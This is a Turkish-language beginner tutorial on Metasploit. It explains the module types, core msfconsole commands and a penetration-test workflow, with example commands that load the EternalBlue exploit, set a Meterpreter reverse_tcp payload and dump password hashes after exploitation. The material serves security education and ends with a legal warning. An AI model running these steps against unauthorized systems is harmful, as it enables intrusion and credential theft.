Ağ haritalamayı Nmap ile tamamladınız ve bir hedef sistemde potansiyel zafiyetler buldunuz. Peki şimdi ne olacak? İşte tam bu noktada, bulunan zafiyetleri doğrulamak ve sömürmek (exploit) için en güçlü silahlardan biri olan Metasploit Framework devreye girer.
Metasploit, etik hacker’ların ve siber güvenlik uzmanlarının vazgeçilmez aracıdır. Zafiyet sömürüsü ve yetki yükseltme işlemlerini sistematik ve profesyonel bir şekilde gerçekleştirmenizi sağlar.
Giriş: Metasploit Framework Nedir?
Metasploit, sızma testi için tasarlanmış açık kaynaklı bir platformdur. Amacı, zafiyetleri keşfetmek, doğrulamak ve sömürmek için standartlaştırılmış bir ortam sunmaktır.
- Geliştiricisi: Rapid7 (Topluluk sürümü de mevcuttur).
- Önemi: Sadece sömürü kodları (Exploitler) sunmakla kalmaz, aynı zamanda bu kodların hedef sisteme ulaşmasını, çalıştırılmasını ve sonuçlarının yönetilmesini sağlayan bir altyapı (Framework) sunar.
- Kullanımı: Kali Linux’ta varsayılan olarak yüklü gelir. Terminalde basitçe
msfconsolekomutu ile başlatılır.
I. Metasploit Modül Yapısı: Framework’ün Kalbi
Metasploit’i anlamak, onun modül yapısını anlamaktan geçer. Her modül, penetrasyon testinin farklı bir aşamasına hizmet eder.
1. 💥 Exploit Modülleri (Sömürü)
- Amaç: Hedef sistemde bulunan bir güvenlik açığından faydalanarak o sisteme yetkisiz erişim sağlamaktır.
- Çalışma Prensibi: Bir exploit, belirli bir yazılımdaki (Örn: eski bir web sunucusu, eski bir veritabanı) kodlama hatasını tetikleyerek saldırganın kodunu çalıştırmasını sağlar.
- Kullanım Örneği: Bir Windows sürümündeki zafiyeti kullanarak sisteme sızmak.
2. 💣 Payload Modülleri (Yük/Faydalı Yük)
- Amaç: Exploit başarılı olduktan sonra hedef sistemde çalışacak olan kod parçacığıdır.
- Çalışma Prensibi: Payload, exploit sayesinde hedef sisteme yerleştirilir. En yaygın payload, saldırganın kontrolündeki makineye geri bağlanacak bir “ters kabuk” (Reverse Shell) oluşturmaktır.
- Kullanım Örneği: Hedef sisteme sızdıktan sonra kontrolü ele almak için kullanılan
meterpreteroturumunu açmak.
3. 🔎 Auxiliary Modülleri (Yardımcı)
- Amaç: Sömürü içermeyen, ancak keşif, tarama, bilgi toplama veya parola kırma gibi yardımcı işlevler gören modüllerdir.
- Kullanım Örneği: Bir hedef sistemdeki SQL sunucusunun varsayılan şifrelerini denemek veya bir ağdaki tüm cihazları taramak.
4. ⚙️ Post Modülleri (Sömürü Sonrası)
- Amaç: Bir sisteme erişim sağlandıktan (exploit başarılı olduktan) sonra, içeride bilgi toplama, yetki yükseltme, kalıcılık sağlama gibi işlemleri gerçekleştirmek.
- Kullanım Örneği: Windows sistemde parola hash’lerini toplamak veya ekran görüntüsü almak.
II. Metasploit Konsolunun Temel Kullanımı (msfconsole)
Terminalde msfconsole yazdıktan sonra karşınıza çıkan arayüzde (Metasploit’in komut satırı arabirimi) kullanmanız gereken temel komutlar şunlardır:
| Komut | Açıklama | Kullanım Örneği |
msfconsole |
Metasploit Framework’ü başlatır. | – |
search [anahtar kelime] |
İlgili exploit, payload veya yardımcı modülleri arar. | search windows smb |
use [modül yolu] |
Kullanmak istediğiniz modülü seçer ve yükler. | use exploit/windows/smb/ms17_010_eternalblue |
show options |
Seçili modülün çalışması için gereken tüm ayarları (hedef IP, port vb.) gösterir. | show options |
set [ayar] [değer] |
Bir modülün gerektirdiği ayarı (option) belirler. | set RHOSTS 192.168.1.10 |
set payload [payload yolu] |
Exploit ile birlikte çalıştırılacak payload’u seçer. | set payload windows/meterpreter/reverse_tcp |
check |
Exploit’i çalıştırmadan önce, hedefin gerçekten zafiyete açık olup olmadığını test eder. (Tüm exploitlerde bulunmaz.) | check |
exploit |
Seçilen modülü ve tüm ayarları kullanarak hedef sisteme saldırıyı başlatır. | exploit |
sessions |
Aktif olan tüm bağlantıları (shell veya meterpreter) listeler ve yönetir. | sessions -i 1 |
III. Temel Penetrasyon Testi İş Akışı (Metasploit İle)
Bir sızma testi, Metasploit kullanılarak genellikle bu adımları takip eder:
- Keşif: Nmap ile hedef IP adresi ve açık portlar bulunur. (Örn: Port 445 açık).
- Zafiyet Tespiti: Açık portta çalışan servisin versiyonu (
-sV) kontrol edilir ve o versiyon için Metasploit’te exploit aranır. (search smb 2.1) - Modül Seçimi: Bulunan zafiyete uygun exploit modülü seçilir. (
use exploit/...) - Ayarların Yapılandırılması:
RHOSTS(Remote Hosts): Hedef IP adresi ayarlanır.LHOST(Local Host): Saldırganın (sizin Kali makinenizin) IP adresi ayarlanır (ters kabuğun geri bağlanacağı adres).- Payload Seçimi: Ters kabuk (
reverse_tcp) payload’u seçilir ve ayarlanır.
- Sömürü (Exploitation): Tüm ayarlar kontrol edildikten sonra
exploitkomutu verilir. - Sömürü Sonrası: Exploit başarılı olursa, bir
meterpreteroturumu açılır. Bu oturumdahashdump,sysinfo,screenshotgibi Post modülleri ile işlemler yapılır.
⚠️ Etik ve Yasal Uyarı
Metasploit, bir sistemin güvenlik açıklarını doğrulamak ve sömürmek için tasarlanmıştır. Bu gücü sadece kendi sanal laboratuvarınızdaki izinli hedefler üzerinde kullanmalısınız.
İzinsiz bir sisteme Metasploit ile exploit göndermek veya sızma girişimi yapmak, Türkiye Cumhuriyeti’nde TCK 243. madde (Bilişim Sistemine Girme) kapsamında ağır bir suçtur.
Sonuç
Metasploit Framework, siber güvenlik uzmanlığı yolunda bir dönüm noktasıdır. Bu modül yapısını ve temel komutları anladığınızda, sadece Nmap ile bulduğunuz zafiyetleri raporlamakla kalmayacak, aynı zamanda onların gerçek riskini de kanıtlayabileceksiniz.